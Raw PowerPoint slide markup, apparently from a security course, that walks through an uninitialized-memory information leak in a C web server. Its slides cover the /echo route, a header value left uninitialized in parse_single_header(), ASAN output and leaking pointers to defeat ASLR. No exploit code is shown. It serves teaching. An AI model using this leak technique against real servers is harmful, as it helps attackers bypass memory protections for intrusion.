          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5400737" y="1229576"/>
            <a:ext cx="2368005" cy="61793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venir Book"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Avenir Book"/>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Avenir Book"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Avenir Book"/>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Avenir Book"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Avenir Book"/>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Avenir Book"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Avenir Book"/>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Avenir Book"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Avenir Book"/>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Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51F37B95-DF41-CE4B-A519-632BB06EA53C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5246176" y="1840691"/>
            <a:ext cx="3778364" cy="1659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endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47ADCA26-59AD-3B48-A321-F3C4540DD365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5246176" y="1878806"/>
            <a:ext cx="3897171" cy="2763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14" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78255AC-5343-704D-881B-254F378E1680}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5127368" y="1809065"/>
            <a:ext cx="3950795" cy="16912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Vulnerability in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>server.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> route to reflect data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/final/exploits/info_leak1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>start.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187486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ext&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FA89E2D-8491-8A3B-CBBA-A970E825AD8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="770571" y="2995747"/>
            <a:ext cx="7951347" cy="1742327"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A0BE5BA-16E7-DA4C-B148-60DD953B620E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209227" y="21076"/>
            <a:ext cx="8973033" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Header Value Inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>parse_single_header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2DBB7A2-A0D5-2A44-9929-CCCAD2E842D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675145" y="1437107"/>
            <a:ext cx="8142200" cy="2763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t>header_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name_len</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value_len</a:t>
            </a:r>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Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Data inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>header_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> NEVER initialized </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Header without a value">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB02E296-B976-F445-9DD0-0F1BB7E7CF13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4746245" y="1015248"/>
            <a:ext cx="4436016" cy="1448495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D3A93BD-4F5D-A545-B0FD-87E3B53EE9F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4746245" y="1969111"/>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Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{125D61E4-4D36-09FC-F156-AB6564836C6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="856323" y="3442154"/>
            <a:ext cx="670745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descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AC6049C-92A0-A279-11D2-39FFBDAB281F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4993389" y="4292967"/>
            <a:ext cx="269467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634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2BF6D67-0D03-D4A2-F931-97B6116F122C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="209227" y="2230567"/>
            <a:ext cx="8803828" cy="723999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A0BE5BA-16E7-DA4C-B148-60DD953B620E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209227" y="21076"/>
            <a:ext cx="8973033" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Result of ASAN Read</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2DBB7A2-A0D5-2A44-9929-CCCAD2E842D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675145" y="1437107"/>
            <a:ext cx="8142200" cy="2763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 = 0xbebebe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Uninitialized memory read!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D3A93BD-4F5D-A545-B0FD-87E3B53EE9F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209227" y="2827403"/>
            <a:ext cx="10306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14" descr="Uninitialized memory read - as an ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE89E802-64D4-D170-BC40-D5CD46A62319}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="5049"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1036522" y="3014426"/>
            <a:ext cx="6410351" cy="1592437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2668565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87C52-B220-6740-B908-FEFF726E3E8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uninitialized Information Leaks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D4F255C-3A39-44AF-A10A-EC6EAF6F68BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629842" y="1260872"/>
            <a:ext cx="3868340" cy="617934"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointer Gets Reused</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABE70C82-4507-4F01-A5C4-8E7EAA00714D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4629156" y="1260872"/>
            <a:ext cx="3887391" cy="617934"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95D6093F-E1EB-4E11-A22B-927FEDB82DC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4629156" y="1878809"/>
            <a:ext cx="3887391" cy="2763441"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>What is our secret data? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Pointers! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Break ASLR!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5" descr="Secret data being reused">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16DC57E5-CB07-E949-88F9-95E7179DF255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="612874" y="2047871"/>
            <a:ext cx="3885308" cy="1635919"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1808865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7E45F-B804-6149-8400-63E802362839}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Query Value – /echo </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3A3EB8F-3BBB-E943-B46E-84E05A0D6D81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6082977" y="719720"/>
            <a:ext cx="2432373" cy="847924"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Query data without 'value' ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0608785-3D09-4F40-8591-59ECBAAC464B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2882900" y="1090293"/>
            <a:ext cx="6261100" cy="1778000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2444AC9-1933-3C4F-B957-849988707281}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3274770"/>
            <a:ext cx="9144000" cy="1781577"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28EACD22-94BA-8A4A-8E70-325B7175DF34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
